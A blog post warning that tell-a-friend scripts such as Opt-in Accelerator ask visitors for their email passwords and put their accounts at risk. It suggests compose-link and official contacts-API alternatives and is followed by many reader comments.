Opt-in Accelerator Warning – Security Risk – Read This First!

 

Optin Accelerator is a massive security risk for your customers – rather than fix the security problems, the new version just adds fluff without addressing core issues.

Anyone can make a mistake, release a product without considering all the possible ramifications, but to release Opt-in Accelerator again without major changes is irresponsible.

The Irresponsible Viral Tell-A-Friend Trio

So far there have been 3 such scripts I have written about, and there is a 4th “coming soon”

  • My first coverage of Opt-in Accelerator
  • Then there was Viral Optin Generator which may well have been a private label or resale rights product
  • Viral Inviter is launching soon – last I saw of this script installed “out in the wild” it was a security risk
  • There is another one I know about, TrafficXplode 2.0 which also features the same security risks

Relook @ Opt-In Accelerator

Opt-in Accelerator

You see that big red circle I added?

That is the key to unlocking:-

  • Your Email
  • Your Google Adsense Account
  • Your Google Adwords Account
  • Google Analytics
  • Google Website Optimizer
  • Your PayPal Account
  • Affiliate program passwords
  • Access Your Blogger account
  • Access any scripts that allow you to resend or reset passwords
  • Open any social media profile that used that email address
  • Did you use that address for domain records? Wave goodbye to your domains

I am not claiming that anyone creating such as script is dishonest, or even the people who might use them, but it takes a huge investment of manpower and financial muscle to keep personal data secure, and those are things most internet marketers don’t have.

All it takes is a script kiddie to come along and compromise the script running on your server, and then rather than acting as an “innocent” tell-a-friend script to boost your email subscribers, it would collect login and password information and forward it to an anonymous server.

All it would take is 2 lines of additional code

We will ignore many of the other potential problems with scraping the email services against their terms of service, potentially breaking the terms of the autoresponder service you use, or totally trashing your email deliverability as 100s of people flag your messages as spam.

I think Robert Plank covered that aspect of Opt-in Accelerator quite adequately.

Solutions

Password data should never be entered in an insecure form hosted by someone without exceptional security in place.

Very Simple Mail To:

This example from Plurk (they also use the insecure method, and have been accused of spam with their Facebook implementation)


http://mail.google.com/mail/?view=cm&cmid=0&fs=1&su=Invitation+to+Plurk.com&body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21%0A%0AAccept+my+invitation+by+going+to%3A%0Ahttp%3A%2F%2Fplurk.com%2FredeemByURL%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2%0A%0ACheck+out+my+profile+at%3A%0Ahttp%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard%0A%0APlurk.com+-+Your+life%2C+on+the+line&tearoff=1&shva=1&ui=1


http://compose.mail.yahoo.com/?Subj=Invitation+to+Plurk.com&Body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21+Accept+my+invitation+by+going+to%3A+http%3A%2F%2Fplurk.com%2FredeemByURL%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2.+Check+out+my+profile+by+going+to%3A+http%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard


http://www.hotmail.msn.com/secure/start?action=compose&subject=Invitation+to+Plurk.com&body=I+have+been+using+Plurk+and+I+think+you+should+check+it+out%21%0A%0AAccept+my+invitation+by+going+to%3A%0Ahttp%3A%2F%2Fplurk.com%2FredeemByURL%3Ffrom_uid%3D15547%26check%3D-1998160234%26s%3D2%0A%0ACheck+out+my+profile+at%3A%0Ahttp%3A%2F%2Fwww.plurk.com%2Fuser%2Fandybeard%0A%0APlurk.com+-+Your+life%2C+on+the+line

This code is wonderful because people use their own email server to send the emails, no strain on your servers, so it could be used on any server, even a shared account which has limitations on how many emails you can send per hour.

Existing APIs

Google Yahoo and Microsoft also have APIs for this kind of stuff which can also be used for finding friends.

Google Contacts API
Yahoo! Contact API
Windows Live Contact API

I should also mention the ongoing Oath efforts being made to create a unified interface for retrieving contact and other personal information with permission.

To be fair, I am going to give Jason a link with some partial counter arguments. He seems to think it is worth the risk.

The problem with that argument is that there is no need for this to be a security risk. It is just junk programming.

 

Liked this post? Follow this blog to get more. Follow

Comments

  1. Dave Sherwin says

    I’m glad I found your blog! Excellent information, I’m glad there’s watchdogs out there in the world policing this stuff because I tend to assume services are trustworthy.

    Thanks for the great info.

    Dave Sherwin

    • says

      We should really thank Andy for the warning! I guess we all assume too many things we find on web as trustworthy. And unfortunately that’s not how the story goes – not always, at least!

  2. Viral Inviter says

    Hey Andy… while I respect your views on these tell a friend scripts I personally think viral inviter rocks…

    In the past week I have been using it i saw a crazy jump in traffic so that’s good for me… But yeah the risks are certainly there – more so on the users side than the person running the script

    All the best
    J

  3. says

    Thanks for the heads-up.

    I don’t think it is a matter of trust. If people enter their information, that means they trust my site enough to let me handle the work, perhaps there should be a privacy policy.

    I may trust Facebook or MySpace, but what if the recipients don’t? Isn’t it the same problem with Optin Accelerator on my site?

    Facebook has permission but not your site, that’s the difference.

    It is more a problem of terms of service too. If the mail account providers disallow it, and also Aweber, then I want to stay on the safe side.

  4. says

    I know that I would not have known anything about the security risk had I not seen that post. I like the way you used screen shots to explain the risk. I am a visual learner.

  5. says

    This is interesting. I’d never considered the security issues involved with TAF technology.

    I’ve always used Viral Friend Generator. Perhaps you can review that one in the future if you touch on this subject again.

    Thanks for an interesting post.

    • says

      It isn’t a scam, the people creating these scripts are as far as I am concerned honest guys, and so will most of the people using them be honest.

      But you should never trust a 3rd party site asking for those details enough to actually even think about entering them.

      Thus anyone using one of these scripts hasn’t really evaluated the risk vs reward, and their sites really are a security risk even if they have no bad intentions.

      You will of course get sites offering a free Wii every day, who are only after farming passwords. How do you tell the difference?

  6. says

    You know what they say about good intentions and the road to hell.

    Thanks for evaluating the risks and sharing that information.

    oh, by the way ACK!!! I remember David Airey’s post on how his gmail got hacked and as a result, he lost his domain name!!!
    (My post on that is the link above.)

  7. says

    Great timing for me. I had bookmarked the page from an email two days ago. The email was from a very well known marketer and he tossed in an endorsement from an even bigger-named marketer. This shouldn’t matter but I guess those of us that know nothing about programing tend to trust certain recommendations without a little research. I don’t hold the marketers at fault, I’m sure they were unaware of the potential risk. Another reminder that we shouldn’t just blindly trust a product based solely on the reputations of those that promote it. Nice post, I appreciate the way it was explained so that anyone can understand.

  8. says

    I don’t think these type of optin scripts are bad. I think they can be made secure by the owners.

    Also, can’t you sue them too if someone sues you?

    “But you should never trust a 3rd party site asking for those details enough to actually even think about entering them.”

    I don’t really agree with that statement. Companies like Facebook and MySpace use it. Why should you trust them?

    And I don’t really think that someone has actually compromised the security of these scripts…

  9. says

    There is no call for that level of programming laziness. All this is doing is putting users in danger. Just one Cross Site Scripting Attack or an SQL injection attack would potentially unlock the entire database and even if it does not it could:

    (a) Phish the email owner to a “new site”
    (b) Capture new sign-ups and steal passwords
    (c) Spam the snot out of all the jucy addresses inside

    It is on point C that these sites become a spammers wet dream. As such it’s not the script kiddies you will need to look out for but the profesional guys. The same guys that only need the hashed version of the password (if they store it) and some time alone with a pass word cracker – rainbow tables make the job of years into the work of seconds.

    I get freaked out about people wanting my twitter login data.

    Now what happens if the domain expires and some evil person takes it over?

    OUCH!

    Those API are there for our protection.

  10. says

    Great reminder andy. Actually I don’t really think it’s good doing or signing into stuffs that are not secure. Those pages would surely scrape into your account. As you may have said it isn’t illegal but it’s not just right and secure

  11. says

    This script is a child’s toy (as evidenced by the lazy way it was coded). You want to make a site with a REAL address importer script like Myspace, Facebook, Tagged, Multiply, Mahalo etc. are using? Call your VC firm (the ones who funded companies major social networking companies) and be prepared to open your wallet.

  12. says

    I do not believe myself readin this post. Numerous number of times I hv provided my details in such kind of sites (not sure if they used the script) so have I exposed my details to them. The first thing I am gonna do now is to change all my passwords. Thansk fro bringing that to our notice. I never thought about it. Next time onwards no fooling around. Thanks again.

  13. says

    I think it’s insane to give away your email password to some third party. Even if someone knows nothing about programming, they should understand that the password provides complete control over their email account.

    I think this approach of wondering if you can “trust” a particular person/site is also flawed. One should worry about the webmaster’s tech-savvy first. For example, I might completely trust my hypothetical grandma who’s running a knitting tips website, but I sure wouldn’t want to let her maintain a database of credit card data.

  14. says

    These sort of opt-in programs make me very nervous, several people I know of on forums have had their accounts hacked and their Paypal and email accounts have been compromised…be careful out there.

  15. says

    Hey Andy, I never looked at it that way. It seems these types of scripts are a hot topic and everyone either has one or is working on one.

    I don’t have one, I can’t say I never thought about it in passing, but having read your post, I will need to start paying more attention to the scripts and softwares being offered.

  16. says

    Thanks for writing about this. I always wondered about the security aspects these ‘inviter’ scripts.

    Andrew

  17. says

    It isn’t a scam, the people creating these scripts are as far as I am concerned honest guys, and so will most of the people using them be honest.IT

    But you should never trust a 3rd party site asking for those details enough to actually even think about entering them.

    Thus anyone using one of these scripts hasn’t really evaluated the risk vs reward, and their sites really are a security risk even if they have no bad intentions.

    You will of course get sites offering a free Wii every day, who are only after farming passwords. How do you tell the difference?

  18. says

    Far out. Andy, it seems to me that every time the less computer literate population gets a little closer to trusting the Internet (with the appropriate degree of discrimination against scams and spam, of course), someone has to go and do something stupid and it leads to yet another big moral panic and suddenly nobody wants to buy stuff of eBay. Don’t know how that works, but I do blame these fellas ;)

  19. says

    Hi Andy,
    I know one of the guys behind the Optin Accelerator, and he points out that the Password is Encrypted (Hashed Out). So theoretically the servers can read it but humans can’t.

    I don’t know enough about it to say on way or the other. But the other script you mentioned, the Viral Optin Generator, sounds interesting, and for the low price it may be worth checking out.

    Thanks!

    Steve Renner

  20. says

    Ya know Ive seen these before on other sites when I was signing up for something and it always made me curious about the safety issues. I mean even if the site says its secure how do you really know for sure. Your giving them YOUR password! I dont trust stuff like this so I usually just “skip” it.

    Another thing Ive always worried about was those automatic scanners. Im sure everyone has run into one at one point or another. Your on a webpage minding your own business and a second later a popup says its scanning your computer. And it really is because I can see MY files being scanned by each name. How do people get away with this crap?!?

  21. says

    Wow. You’d think people would choose a little more carefully before releasing something.

    How damaging is this to their reputation? Hope they made enough to pay for lawyers.

    Thanks for the heads up!

  22. says

    Great post! The information you have so provided here was so educating as well as enlightening. I am sure many people needs to know about this for their protection.

  23. says

    This is truly a disturbing post.

    However, I remain grateful that I took the time to read and become informed.

    This information is very practical and good to know. Thanks for providing the information.

  24. says

    Yes, i have found some social networking sites that asks for your password to get through to your email and get contacts. I usually dont input my password since there might be some sniffing dogs who wanted to get my password and use it to open my account.

    Thank you and i hope we could build a community of watchdogs against these sites.

    Charles
    Money Making and Blogging Tips
    http://www.resourcesandmoney.blogspot.com

  25. says

    The thing that I am worried about is that they may be violating certain Terms of Service contracts. Most email providers forbid members to share their login information with any third party entity, and the so-called “Opt In Accelerator scam” does just that. Fortunately, very few email providers actually enforce their TOS to that point, in fact, have you seen Multiply or Facebook get into trouble with a major email service provider?

  26. says

    Thanks for the heads up!

    I was literally on this site yesterday then found your blog post today.

    Thanks again for the warning.

  27. says

    Dear,
    U remember the issue with gmail archiver? it also had similar issues lik opt-in accelerator! I think people are there still using gmail archiver! (pss… i got that free with a computr magazine)

  28. says

    Thanks for the heads-up Andy. I was considering using it to increase traffic but now I realize I have to weigh the risks vs. the benefits.

  29. says

    The best way to keep your paypal safe is use a separate email just for paypal and nothing else.

    Also sorts all those spam mails about paypal problems too.

    The other problem with these invite scripts is that people (like me) see them as spam. OK they have my mates name on them but they’re nothing less than a spammy sell sell sell message and make me disinclined to join a site that sends them.

  30. says

    This a very informative (and disturbing) post. I’ve heard of adwords accounts being hacked/phished and the damage can be extraordinary. You’ve got to consider not only your account being used to rack up a huge adwords bill but also all of your campaign data being stolen and the loss of income when your main traffic sources dies.

    It is an awful lot riding on one password:(

  31. says

    This is a great post. Personally I do not optin any place if I think the information I receive is really required. With all the hackers and programs in cyberspace, everyone should be very careful before giving out any personal information that opens door for disaster.

  32. says

    Very excellent information. I never knew that there could be a potential risks with certain programs. I am surprised there wasn’t more from this.

  33. says

    That’s a very exhaustive and informative review of optins. I think people should think twice before giving away some information. This can be a spam bait for some!

  34. says

    Hi Andy… while I respect your views on these tell a friend scripts I personally think viral inviter rocks…I’m glad I found your blog! Excellent information, I’m glad there’s watchdogs out there in the world policing this stuff…I don’t really think it’s good doing or signing into stuffs that are not secure.”But you should never trust a 3rd party site asking for those details enough to actually even think about entering them.”You will of course get sites offering a free Wii every day, who are only after farming passwords..All the best…….

  35. says

    I have a good read, thanks for the information and insights you have so provided here. I will certainly bookmark your blog for future reads. Thanks!

  36. says

    Andy, what was the follow-up of this story? Did you contact these guys and informed them of the security flaws you found? What was their reaction?

  37. says

    Thanks for the heads up Andy.
    Lord Matt – that’s the first thing I thought of as a security concern “SQL Injection Attacks”. Once someone has grabbed that huge database who knows what will happen next. In our virtual office and serviced offices we’re very conscience of security with clients personal information, it’s about time others follow suit.

  38. says

    Nice article, Andy as I haven’t even think about that we can control all the email, paypal and even blogger accounts under one roof…

    Thanks for the great post :)

  39. says

    Hi Andy,

    Thanks for the post! I had no idea that entering your password into a form like this could make it possible for someone to unlock everything from your Gmail account to all you domain names.

    It sounds like we should all be using security certificates on all our membership sites.

    All the best!

  40. says

    This is a great article (post, whatever :) ). I’ve never trusted TAF or any other application which asks me to provide my password for a 3rd. party service: Doen’t even talk about sending that over an unsecure connection.

    Last year I installed a TAF form on one of my sites (coded by myself) and had to shut it down less than a week later due to member abuse. Now I’m using a “mailto” link which just triggers users e-mail client.

  41. says

    Thank Andy for such a nice post. Although I am not a user and might have never used the program. But just to see that guys like you are watching our interest. They are doing our dirty work for us so to speak so that we won’t get into any trouble.

    Plus like the screen shots. I guess they are now more vital to be part of the posts

    Cheers / Jessica

  42. says

    Shoot i wish i would have found this out yesterday.

    I just used this script or a similar one.
    BUT i changed my gmail password before and right after.
    But the script was flawed and didn’t show me all my 2000+ address, to uncheck the ones i didn’t want to send to, so i ended up spamming a TON of people.
    And got 700 bounce backs or Mail delivery failed, as the address books a bit outdated, my gmail address was blocked & the server was blacklisted…

    boy what a mess.
    I am so glad i didn’t use my domain to send emails from, that could have been a disaster.

  43. says

    Hi.

    This is a good insightfull take on very important issue.
    while i am trying to understand the issues regarding the privacy in the internet space. face book and similar sites are using these details for their purpose so why not others if they show a terms of use agreement.

    Thanks

  44. says

    I just used this script or a similar one.
    BUT i changed my gmail password before and right after.
    But the script was flawed and didn’t show me all my 2000+ address, to uncheck the ones i didn’t want to send to, so i ended up spamming a TON of people.Thank Andy for such a nice post. Although I am not a user and might have never used the program. But just to see that guys like you are watching our interest. They are doing our dirty work for us so to speak so that we won’t get into any trouble.

  45. says

    It’s incredible how easy people give away this infromation not thinking at all. I have a secondary mail adress that i use on all unsafe sites.

    Thanks for the great post!

  46. says

    This is a constant reminder that you need to be careful. Lately I have been getting a lot of spam email and I just ignore it. You also need to do what you can to make sure your server and site is secure.

Trackbacks

  1. [...] Comment on Opt-in Accelerator Warning – Security Risk – Read This … – Hey Andy… while I respect your views on these tell a friend scripts I personally think viral inviter rocks… In the past week I have been using it i saw a crazy jump in traffic so that's good for me… But yeah the risks are certainly … [...]